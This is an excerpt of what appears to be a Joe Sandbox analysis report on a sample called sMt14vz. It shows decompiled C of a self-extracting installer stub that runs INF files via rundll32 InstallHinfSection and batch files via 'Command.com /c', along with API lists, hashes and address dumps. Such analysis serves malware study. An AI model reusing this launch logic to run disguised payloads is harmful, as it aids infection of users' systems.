                                                                                                                                                                                                                                            • LocalFree.KERNEL32(?,00000000,00000000,00000010,00000000,?,?,?,010D8C42), ref: 010D3FC2
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.338526724.00000000010D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 010D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338519106.00000000010D0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338553666.00000000010D8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_10d0000_sMt14vz.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Free$Resource$Local$Library$CompareFindString$AddressLoadLockProcSizeofmemcpy_smemset
                                                                                                                                                                                                                                            • String ID: <None>$ADMQCMD$D$DoInfInstall$POSTRUNPROGRAM$REBOOT$RUNPROGRAM$SHOWWINDOW$USRQCMD$advpack.dll
                                                                                                                                                                                                                                            • API String ID: 1032054927-3892089904
                                                                                                                                                                                                                                            • Opcode ID: 746b6419ef69c125de663fa1deea86c6764120465f3e2f8f593d7cd4deb9d382
                                                                                                                                                                                                                                            • Instruction ID: cc407f0f22105def04b8b901db5d1f2000925f91e6a2e9cdd3585147e3582f21
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 746b6419ef69c125de663fa1deea86c6764120465f3e2f8f593d7cd4deb9d382
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F5B1CDB06093059BE770AF28D845B6B7AE4FB84704F00496EFAD5DA1C0DB7AC844CB97
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 141 10d1ae8-10d1b2c call 10d1680 144 10d1b2e-10d1b39 141->144 145 10d1b3b-10d1b40 141->145 146 10d1b46-10d1b61 call 10d1a84 144->146 145->146 149 10d1b9f-10d1bc2 call 10d1781 call 10d658a 146->149 150 10d1b63-10d1b65 146->150 159 10d1bc7-10d1bd3 call 10d66c8 149->159 151 10d1b68-10d1b6d 150->151 151->151 153 10d1b6f-10d1b74 151->153 153->149 155 10d1b76-10d1b7b 153->155 157 10d1b7d-10d1b81 155->157 158 10d1b83-10d1b86 155->158 157->158 161 10d1b8c-10d1b9d call 10d1680 157->161 158->149 162 10d1b88-10d1b8a 158->162 165 10d1bd9-10d1bf1 CompareStringA 159->165 166 10d1d73-10d1d7f call 10d66c8 159->166 161->159 162->149 162->161 165->166 168 10d1bf7-10d1c07 GetFileAttributesA 165->168 175 10d1df8-10d1e09 LocalAlloc 166->175 176 10d1d81-10d1d99 CompareStringA 166->176 170 10d1c0d-10d1c15 168->170 171 10d1d53-10d1d5e 168->171 170->171 174 10d1c1b-10d1c33 call 10d1a84 170->174 173 10d1d64-10d1d6e call 10d44b9 171->173 187 10d1e94-10d1ea4 call 10d6ce0 173->187 189 10d1c35-10d1c38 174->189 190 10d1c50-10d1c61 LocalAlloc 174->190 178 10d1e0b-10d1e1b GetFileAttributesA 175->178 179 10d1dd4-10d1ddf 175->179 176->175 181 10d1d9b-10d1da2 176->181 183 10d1e1d-10d1e1f 178->183 184 10d1e67-10d1e73 call 10d1680 178->184 179->173 186 10d1da5-10d1daa 181->186 183->184 188 10d1e21-10d1e3e call 10d1781 183->188 199 10d1e78-10d1e84 call 10d2aac 184->199 186->186 191 10d1dac-10d1db4 186->191 188->199 210 10d1e40-10d1e43 188->210 195 10d1c3a 189->195 196 10d1c40-10d1c4b call 10d1a84 189->196 190->179 198 10d1c67-10d1c72 190->198 197 10d1db7-10d1dbc 191->197 195->196 196->190 197->197 203 10d1dbe-10d1dd2 LocalAlloc 197->203 204 10d1c79-10d1cc0 GetPrivateProfileIntA GetPrivateProfileStringA 198->204 205 10d1c74 198->205 209 10d1e89-10d1e92 
199->209 203->179 211 10d1de1-10d1df3 call 10d171e 203->211 207 10d1cf8-10d1d07 204->207 208 10d1cc2-10d1ccc 204->208 205->204 215 10d1d09-10d1d21 GetShortPathNameA 207->215 216 10d1d23 207->216 212 10d1cce 208->212 213 10d1cd3-10d1cf3 call 10d1680 * 2 208->213 209->187 210->199 214 10d1e45-10d1e65 call 10d16b3 * 2 210->214 211->209 212->213 213->209 214->199 220 10d1d28-10d1d2b 215->220 216->220 224 10d1d2d 220->224 225 10d1d32-10d1d4e call 10d171e 220->225 224->225 225->209
                                                                                                                                                                                                                                            C-Code - Quality: 82%
                                                                                                                                                                                                                                            			E010D1AE8(long __ecx, CHAR** _a4, int* _a8) {
                                                                                                                                                                                                                                            				signed int _v8;
				char _v268;
				char _v527;
				char _v528;
				char _v1552;
				CHAR* _v1556;
				int* _v1560;
				CHAR** _v1564;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t48;
				CHAR* _t53;
				CHAR* _t54;
				char* _t57;
				char* _t58;
				CHAR* _t60;
				void* _t62;
				signed char _t65;
				intOrPtr _t76;
				intOrPtr _t77;
				unsigned int _t85;
				CHAR* _t90;
				CHAR* _t92;
				char _t105;
				char _t106;
				CHAR** _t111;
				CHAR* _t115;
				intOrPtr* _t125;
				void* _t126;
				CHAR* _t132;
				CHAR* _t135;
				void* _t138;
				void* _t139;
				void* _t145;
				intOrPtr* _t146;
				char* _t148;
				CHAR* _t151;
				void* _t152;
				CHAR* _t155;
				CHAR* _t156;
				void* _t157;
				signed int _t158;

				_t48 =  *0x10d8004; // 0xc2f4ed82
				_v8 = _t48 ^ _t158;
				_t108 = __ecx;
				_v1564 = _a4;
				_v1560 = _a8;
				E010D1680( &_v528, 0x104, __ecx);
				if(_v528 != 0x22) {
					_t135 = " ";
					_t53 =  &_v528;
				} else {
					_t135 = "\"";
					_t53 =  &_v527;
				}
				_t111 =  &_v1556;
				_v1556 = _t53;
				_t54 = E010D1A84(_t111, _t135);
				_t156 = _v1556;
				_t151 = _t54;
				if(_t156 == 0) {
					L12:
					_push(_t111);
					E010D1781( &_v268, 0x104, _t111, 0x10d91e4);
					E010D658A( &_v268, 0x104, _t156);
					goto L13;
				} else {
					_t132 = _t156;
					_t148 =  &(_t132[1]);
					do {
						_t105 =  *_t132;
						_t132 =  &(_t132[1]);
					} while (_t105 != 0);
					_t111 = _t132 - _t148;
					if(_t111 < 3) {
						goto L12;
					}
					_t106 = _t156[1];
					if(_t106 != 0x3a || _t156[2] != 0x5c) {
						if( *_t156 != 0x5c || _t106 != 0x5c) {
							goto L12;
						} else {
							goto L11;
						}
					} else {
						L11:
						E010D1680( &_v268, 0x104, _t156);
						L13:
						_t138 = 0x2e;
						_t57 = E010D66C8(_t156, _t138);
						if(_t57 == 0 || CompareStringA(0x7f, 1, _t57, 0xffffffff, ".INF", 0xffffffff) != 0) {
							_t139 = 0x2e;
							_t115 = _t156;
							_t58 = E010D66C8(_t115, _t139);
							if(_t58 == 0 || CompareStringA(0x7f, 1, _t58, 0xffffffff, ".BAT", 0xffffffff) != 0) {
								_t156 = LocalAlloc(0x40, 0x400);
								if(_t156 == 0) {
									goto L43;
								}
								_t65 = GetFileAttributesA( &_v268); // executed
								if(_t65 == 0xffffffff || (_t65 & 0x00000010) != 0) {
									E010D1680( &_v1552, 0x400, _t108);
								} else {
									_push(_t115);
									_t108 = 0x400;
									E010D1781( &_v1552, 0x400, _t115,  &_v268);
									if(_t151 != 0 &&  *_t151 != 0) {
										E010D16B3( &_v1552, 0x400, " ");
										E010D16B3( &_v1552, 0x400, _t151);
									}
								}
								_t140 = _t156;
								 *_t156 = 0;
								E010D2AAC( &_v1552, _t156, _t156);
								goto L53;
							} else {
								_t108 = "Command.com /c %s";
								_t125 = "Command.com /c %s";
								_t145 = _t125 + 1;
								do {
									_t76 =  *_t125;
									_t125 = _t125 + 1;
								} while (_t76 != 0);
								_t126 = _t125 - _t145;
								_t146 =  &_v268;
								_t157 = _t146 + 1;
								do {
									_t77 =  *_t146;
									_t146 = _t146 + 1;
								} while (_t77 != 0);
								_t140 = _t146 - _t157;
								_t154 = _t126 + 8 + _t146 - _t157;
								_t156 = LocalAlloc(0x40, _t126 + 8 + _t146 - _t157);
								if(_t156 != 0) {
									E010D171E(_t156, _t154, "Command.com /c %s",  &_v268);
									goto L53;
								}
								goto L43;
							}
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							_t85 = GetFileAttributesA( &_v268);
                                                                                                                                                                                                                                            							if(_t85 == 0xffffffff || ( !(_t85 >> 4) & 0x00000001) == 0) {
                                                                                                                                                                                                                                            								_t140 = 0x525;
                                                                                                                                                                                                                                            								_push(0);
                                                                                                                                                                                                                                            								_push(0x10);
                                                                                                                                                                                                                                            								_push(0);
                                                                                                                                                                                                                                            								_t60 =  &_v268;
                                                                                                                                                                                                                                            								goto L35;
                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                            								_t140 = "[";
                                                                                                                                                                                                                                            								_v1556 = _t151;
                                                                                                                                                                                                                                            								_t90 = E010D1A84( &_v1556, "[");
                                                                                                                                                                                                                                            								if(_t90 != 0) {
                                                                                                                                                                                                                                            									if( *_t90 != 0) {
                                                                                                                                                                                                                                            										_v1556 = _t90;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            									_t140 = "]";
                                                                                                                                                                                                                                            									E010D1A84( &_v1556, "]");
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            								_t156 = LocalAlloc(0x40, 0x200);
                                                                                                                                                                                                                                            								if(_t156 == 0) {
                                                                                                                                                                                                                                            									L43:
                                                                                                                                                                                                                                            									_t60 = 0;
                                                                                                                                                                                                                                            									_t140 = 0x4b5;
                                                                                                                                                                                                                                            									_push(0);
                                                                                                                                                                                                                                            									_push(0x10);
                                                                                                                                                                                                                                            									_push(0);
                                                                                                                                                                                                                                            									L35:
                                                                                                                                                                                                                                            									_push(_t60);
                                                                                                                                                                                                                                            									E010D44B9(0, _t140);
                                                                                                                                                                                                                                            									_t62 = 0;
                                                                                                                                                                                                                                            									goto L54;
                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                            									_t155 = _v1556;
                                                                                                                                                                                                                                            									_t92 = _t155;
                                                                                                                                                                                                                                            									if( *_t155 == 0) {
                                                                                                                                                                                                                                            										_t92 = "DefaultInstall";
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            									 *0x10d9120 = GetPrivateProfileIntA(_t92, "Reboot", 0,  &_v268);
                                                                                                                                                                                                                                            									 *_v1560 = 1;
                                                                                                                                                                                                                                            									if(GetPrivateProfileStringA("Version", "AdvancedINF", 0x10d1140, _t156, 8,  &_v268) == 0) {
                                                                                                                                                                                                                                            										 *0x10d9a34 =  *0x10d9a34 & 0xfffffffb;
                                                                                                                                                                                                                                            										if( *0x10d9a40 != 0) {
                                                                                                                                                                                                                                            											_t108 = "setupapi.dll";
                                                                                                                                                                                                                                            										} else {
                                                                                                                                                                                                                                            											_t108 = "setupx.dll";
                                                                                                                                                                                                                                            											GetShortPathNameA( &_v268,  &_v268, 0x104);
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            										if( *_t155 == 0) {
                                                                                                                                                                                                                                            											_t155 = "DefaultInstall";
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            										_push( &_v268);
                                                                                                                                                                                                                                            										_push(_t155);
                                                                                                                                                                                                                                            										E010D171E(_t156, 0x200, "rundll32.exe %s,InstallHinfSection %s 128 %s", _t108);
                                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                                            										 *0x10d9a34 =  *0x10d9a34 | 0x00000004;
                                                                                                                                                                                                                                            										if( *_t155 == 0) {
                                                                                                                                                                                                                                            											_t155 = "DefaultInstall";
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            										E010D1680(_t108, 0x104, _t155);
                                                                                                                                                                                                                                            										_t140 = 0x200;
                                                                                                                                                                                                                                            										E010D1680(_t156, 0x200,  &_v268);
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            									L53:
                                                                                                                                                                                                                                            									_t62 = 1;
                                                                                                                                                                                                                                            									 *_v1564 = _t156;
                                                                                                                                                                                                                                            									L54:
                                                                                                                                                                                                                                            									_pop(_t152);
                                                                                                                                                                                                                                            									return E010D6CE0(_t62, _t108, _v8 ^ _t158, _t140, _t152, _t156);
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            			}
                                                                                                                                                                                                                                            0x010d1d75
                                                                                                                                                                                                                                            0x010d1d76
                                                                                                                                                                                                                                            0x010d1d78
                                                                                                                                                                                                                                            0x010d1d7f
                                                                                                                                                                                                                                            0x010d1e05
                                                                                                                                                                                                                                            0x010d1e09
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d1e12
                                                                                                                                                                                                                                            0x010d1e1b
                                                                                                                                                                                                                                            0x010d1e73
                                                                                                                                                                                                                                            0x010d1e21
                                                                                                                                                                                                                                            0x010d1e21
                                                                                                                                                                                                                                            0x010d1e28
                                                                                                                                                                                                                                            0x010d1e37
                                                                                                                                                                                                                                            0x010d1e3e
                                                                                                                                                                                                                                            0x010d1e52
                                                                                                                                                                                                                                            0x010d1e60
                                                                                                                                                                                                                                            0x010d1e60
                                                                                                                                                                                                                                            0x010d1e3e
                                                                                                                                                                                                                                            0x010d1e79
                                                                                                                                                                                                                                            0x010d1e7b
                                                                                                                                                                                                                                            0x010d1e84
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d1d9b
                                                                                                                                                                                                                                            0x010d1d9b
                                                                                                                                                                                                                                            0x010d1da0
                                                                                                                                                                                                                                            0x010d1da2
                                                                                                                                                                                                                                            0x010d1da5
                                                                                                                                                                                                                                            0x010d1da5
                                                                                                                                                                                                                                            0x010d1da7
                                                                                                                                                                                                                                            0x010d1da8
                                                                                                                                                                                                                                            0x010d1dac
                                                                                                                                                                                                                                            0x010d1dae
                                                                                                                                                                                                                                            0x010d1db4
                                                                                                                                                                                                                                            0x010d1db7
                                                                                                                                                                                                                                            0x010d1db7
                                                                                                                                                                                                                                            0x010d1db9
                                                                                                                                                                                                                                            0x010d1dba
                                                                                                                                                                                                                                            0x010d1dbe
                                                                                                                                                                                                                                            0x010d1dc3
                                                                                                                                                                                                                                            0x010d1dce
                                                                                                                                                                                                                                            0x010d1dd2
                                                                                                                                                                                                                                            0x010d1deb
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d1df0
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d1dd2
                                                                                                                                                                                                                                            0x010d1bf7
                                                                                                                                                                                                                                            0x010d1bfe
                                                                                                                                                                                                                                            0x010d1c07
                                                                                                                                                                                                                                            0x010d1d55
                                                                                                                                                                                                                                            0x010d1d5a
                                                                                                                                                                                                                                            0x010d1d5b
                                                                                                                                                                                                                                            0x010d1d5d
                                                                                                                                                                                                                                            0x010d1d5e
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d1c1b
                                                                                                                                                                                                                                            0x010d1c1b
                                                                                                                                                                                                                                            0x010d1c20
                                                                                                                                                                                                                                            0x010d1c2c
                                                                                                                                                                                                                                            0x010d1c33
                                                                                                                                                                                                                                            0x010d1c38
                                                                                                                                                                                                                                            0x010d1c3a
                                                                                                                                                                                                                                            0x010d1c3a
                                                                                                                                                                                                                                            0x010d1c40
                                                                                                                                                                                                                                            0x010d1c4b
                                                                                                                                                                                                                                            0x010d1c4b
                                                                                                                                                                                                                                            0x010d1c5d
                                                                                                                                                                                                                                            0x010d1c61
                                                                                                                                                                                                                                            0x010d1dd4
                                                                                                                                                                                                                                            0x010d1dd4
                                                                                                                                                                                                                                            0x010d1dd6
                                                                                                                                                                                                                                            0x010d1ddb
                                                                                                                                                                                                                                            0x010d1ddc
                                                                                                                                                                                                                                            0x010d1dde
                                                                                                                                                                                                                                            0x010d1d64
                                                                                                                                                                                                                                            0x010d1d64
                                                                                                                                                                                                                                            0x010d1d67
                                                                                                                                                                                                                                            0x010d1d6c
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d1c67
                                                                                                                                                                                                                                            0x010d1c67
                                                                                                                                                                                                                                            0x010d1c6d
                                                                                                                                                                                                                                            0x010d1c72
                                                                                                                                                                                                                                            0x010d1c74
                                                                                                                                                                                                                                            0x010d1c74
                                                                                                                                                                                                                                            0x010d1c8e
                                                                                                                                                                                                                                            0x010d1c99
                                                                                                                                                                                                                                            0x010d1cc0
                                                                                                                                                                                                                                            0x010d1cf8
                                                                                                                                                                                                                                            0x010d1d07
                                                                                                                                                                                                                                            0x010d1d23
                                                                                                                                                                                                                                            0x010d1d09
                                                                                                                                                                                                                                            0x010d1d14
                                                                                                                                                                                                                                            0x010d1d1b
                                                                                                                                                                                                                                            0x010d1d1b
                                                                                                                                                                                                                                            0x010d1d2b
                                                                                                                                                                                                                                            0x010d1d2d
                                                                                                                                                                                                                                            0x010d1d2d
                                                                                                                                                                                                                                            0x010d1d38
                                                                                                                                                                                                                                            0x010d1d39
                                                                                                                                                                                                                                            0x010d1d46
                                                                                                                                                                                                                                            0x010d1cc2
                                                                                                                                                                                                                                            0x010d1cc2
                                                                                                                                                                                                                                            0x010d1ccc
                                                                                                                                                                                                                                            0x010d1cce
                                                                                                                                                                                                                                            0x010d1cce
                                                                                                                                                                                                                                            0x010d1cdb
                                                                                                                                                                                                                                            0x010d1ce6
                                                                                                                                                                                                                                            0x010d1cee
                                                                                                                                                                                                                                            0x010d1cee

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • CompareStringA.KERNEL32(0000007F,00000001,00000000,000000FF,.INF,000000FF,?,?,010D91E4,?,?,00000000,00000001,00000000), ref: 010D1BE7
                                                                                                                                                                                                                                            • GetFileAttributesA.KERNEL32(?,?,010D91E4,?,?,00000000,00000001,00000000), ref: 010D1BFE
                                                                                                                                                                                                                                            • LocalAlloc.KERNEL32(00000040,00000200,?,010D91E4,?,?,00000000,00000001,00000000), ref: 010D1C57
                                                                                                                                                                                                                                            • GetPrivateProfileIntA.KERNEL32 ref: 010D1C88
                                                                                                                                                                                                                                            • GetPrivateProfileStringA.KERNEL32(Version,AdvancedINF,010D1140,00000000,00000008,?), ref: 010D1CB8
                                                                                                                                                                                                                                            • GetShortPathNameA.KERNEL32 ref: 010D1D1B
                                                                                                                                                                                                                                              • Part of subcall function 010D44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 010D4518
                                                                                                                                                                                                                                              • Part of subcall function 010D44B9: MessageBoxA.USER32(?,?,010D9154,00010010), ref: 010D4554
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.338526724.00000000010D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 010D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338519106.00000000010D0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338553666.00000000010D8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_10d0000_sMt14vz.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: String$PrivateProfile$AllocAttributesCompareFileLoadLocalMessageNamePathShort
                                                                                                                                                                                                                                            • String ID: "$.BAT$.INF$AdvancedINF$Command.com /c %s$DefaultInstall$Reboot$Version$rundll32.exe %s,InstallHinfSection %s 128 %s$setupapi.dll$setupx.dll
                                                                                                                                                                                                                                            • API String ID: 383838535-3174370420
                                                                                                                                                                                                                                            • Opcode ID: ed84142cd2e4cfdebd01dab6928d1865ffd986d50b6b229d88b9822915a527e0
                                                                                                                                                                                                                                            • Instruction ID: 1cd4f7c3f0556dd74a549e06e8f287729551a4c570a57170f901a7dbfa7361c8
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ed84142cd2e4cfdebd01dab6928d1865ffd986d50b6b229d88b9822915a527e0
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FEA17970A003196BEB70AB38CC44FEA3BA9AF55310F1442D9E5D5A32C1DFB19E85CB50
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            C-Code - Quality: 82%
                                                                                                                                                                                                                                            			E010D2F1D(void* __ecx, int __edx) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v272;
                                                                                                                                                                                                                                            				_Unknown_base(*)()* _v276;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t9;
                                                                                                                                                                                                                                            				void* _t11;
                                                                                                                                                                                                                                            				struct HWND__* _t12;
                                                                                                                                                                                                                                            				void* _t14;
                                                                                                                                                                                                                                            				int _t21;
                                                                                                                                                                                                                                            				signed int _t22;
                                                                                                                                                                                                                                            				signed int _t25;
                                                                                                                                                                                                                                            				intOrPtr* _t26;
                                                                                                                                                                                                                                            				signed int _t27;
                                                                                                                                                                                                                                            				void* _t30;
                                                                                                                                                                                                                                            				_Unknown_base(*)()* _t31;
                                                                                                                                                                                                                                            				void* _t34;
                                                                                                                                                                                                                                            				struct HINSTANCE__* _t36;
                                                                                                                                                                                                                                            				intOrPtr* _t44;
                                                                                                                                                                                                                                            				signed int _t46;
                                                                                                                                                                                                                                            				int _t47;
                                                                                                                                                                                                                                            				void* _t58;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t43 = __edx;
                                                                                                                                                                                                                                            				_t9 =  *0x10d8004; // 0xc2f4ed82
                                                                                                                                                                                                                                            				_v8 = _t9 ^ _t46;
                                                                                                                                                                                                                                            				if( *0x10d8a38 != 0) {
                                                                                                                                                                                                                                            					L5:
                                                                                                                                                                                                                                            					_t11 = E010D5164(_t52);
                                                                                                                                                                                                                                            					_t53 = _t11;
                                                                                                                                                                                                                                            					if(_t11 == 0) {
                                                                                                                                                                                                                                            						L16:
                                                                                                                                                                                                                                            						_t12 = 0;
                                                                                                                                                                                                                                            						L17:
                                                                                                                                                                                                                                            						return E010D6CE0(_t12, _t36, _v8 ^ _t46, _t43, _t44, _t45);
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_t14 = E010D55A0(_t53); // executed
                                                                                                                                                                                                                                            					if(_t14 == 0) {
                                                                                                                                                                                                                                            						goto L16;
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						_t45 = 0x105;
                                                                                                                                                                                                                                            						GetSystemDirectoryA( &_v272, 0x105);
                                                                                                                                                                                                                                            						_t43 = 0x105;
                                                                                                                                                                                                                                            						_t40 =  &_v272;
                                                                                                                                                                                                                                            						E010D658A( &_v272, 0x105, "advapi32.dll");
                                                                                                                                                                                                                                            						_t36 = LoadLibraryA( &_v272);
                                                                                                                                                                                                                                            						_t44 = 0;
                                                                                                                                                                                                                                            						if(_t36 != 0) {
                                                                                                                                                                                                                                            							_t31 = GetProcAddress(_t36, "DecryptFileA");
                                                                                                                                                                                                                                            							_v276 = _t31;
                                                                                                                                                                                                                                            							if(_t31 != 0) {
                                                                                                                                                                                                                                            								_t45 = _t47;
                                                                                                                                                                                                                                            								_t40 = _t31;
                                                                                                                                                                                                                                            								 *0x10da288(0x10d91e4, 0); // executed
                                                                                                                                                                                                                                            								_v276();
                                                                                                                                                                                                                                            								if(_t47 != _t47) {
                                                                                                                                                                                                                                            									_t40 = 4;
                                                                                                                                                                                                                                            									asm("int 0x29");
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						FreeLibrary(_t36);
                                                                                                                                                                                                                                            						_t58 =  *0x10d8a24 - _t44; // 0x0
                                                                                                                                                                                                                                            						if(_t58 != 0 ||  *0x10d9a30 != _t44) {
                                                                                                                                                                                                                                            							L14:
                                                                                                                                                                                                                                            							_t21 = SetCurrentDirectoryA(0x10d91e4); // executed
                                                                                                                                                                                                                                            							if(_t21 != 0) {
                                                                                                                                                                                                                                            								__eflags =  *0x10d8a2c - _t44; // 0x0
                                                                                                                                                                                                                                            								if(__eflags != 0) {
                                                                                                                                                                                                                                            									L20:
                                                                                                                                                                                                                                            									__eflags =  *0x10d8d48 & 0x000000c0;
                                                                                                                                                                                                                                            									if(( *0x10d8d48 & 0x000000c0) == 0) {
                                                                                                                                                                                                                                            										_t26 = E010D256D( *0x10d9a40); // executed
                                                                                                                                                                                                                                            										_t44 = _t26;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            									_t22 =  *0x10d8a24; // 0x0
                                                                                                                                                                                                                                            									 *0x10d9a44 = _t44;
                                                                                                                                                                                                                                            									__eflags = _t22;
                                                                                                                                                                                                                                            									if(_t22 != 0) {
                                                                                                                                                                                                                                            										L26:
                                                                                                                                                                                                                                            										__eflags =  *0x10d8a38;
                                                                                                                                                                                                                                            										if( *0x10d8a38 == 0) {
                                                                                                                                                                                                                                            											__eflags = _t22;
                                                                                                                                                                                                                                            											if(__eflags == 0) {
                                                                                                                                                                                                                                            												E010D4169(__eflags);
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            										_t12 = 1;
                                                                                                                                                                                                                                            										goto L17;
                                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                                            										__eflags =  *0x10d9a30 - _t22;
                                                                                                                                                                                                                                            										if( *0x10d9a30 != _t22) {
                                                                                                                                                                                                                                            											goto L26;
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            										_t25 = E010D3BA2(); // executed
                                                                                                                                                                                                                                            										__eflags = _t25;
                                                                                                                                                                                                                                            										if(_t25 == 0) {
                                                                                                                                                                                                                                            											goto L16;
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            										_t22 =  *0x10d8a24; // 0x0
                                                                                                                                                                                                                                            										goto L26;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            								_t27 = E010D3B26(_t40, _t44);
                                                                                                                                                                                                                                            								__eflags = _t27;
                                                                                                                                                                                                                                            								if(_t27 == 0) {
                                                                                                                                                                                                                                            									goto L16;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            								goto L20;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							_t43 = 0x4bc;
                                                                                                                                                                                                                                            							E010D44B9(0, 0x4bc, _t44, _t44, 0x10, _t44);
                                                                                                                                                                                                                                            							 *0x10d9124 = E010D6285();
                                                                                                                                                                                                                                            							goto L16;
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							_t30 = E010D621E(); // executed
                                                                                                                                                                                                                                            							if(_t30 == 0) {
                                                                                                                                                                                                                                            								goto L16;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							goto L14;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t49 =  *0x10d8a24;
                                                                                                                                                                                                                                            				if( *0x10d8a24 != 0) {
                                                                                                                                                                                                                                            					L4:
                                                                                                                                                                                                                                            					_t34 = E010D3A3F(_t51);
                                                                                                                                                                                                                                            					_t52 = _t34;
                                                                                                                                                                                                                                            					if(_t34 == 0) {
                                                                                                                                                                                                                                            						goto L16;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					goto L5;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				if(E010D51E5(_t49) == 0) {
                                                                                                                                                                                                                                            					goto L16;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t51 =  *0x10d8a38;
                                                                                                                                                                                                                                            				if( *0x10d8a38 != 0) {
                                                                                                                                                                                                                                            					goto L5;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				goto L4;
                                                                                                                                                                                                                                            			}


























                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d3093
                                                                                                                                                                                                                                            0x010d3098
                                                                                                                                                                                                                                            0x010d309a
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d309c
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d309c
                                                                                                                                                                                                                                            0x010d3089
                                                                                                                                                                                                                                            0x010d305c
                                                                                                                                                                                                                                            0x010d3061
                                                                                                                                                                                                                                            0x010d3063
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
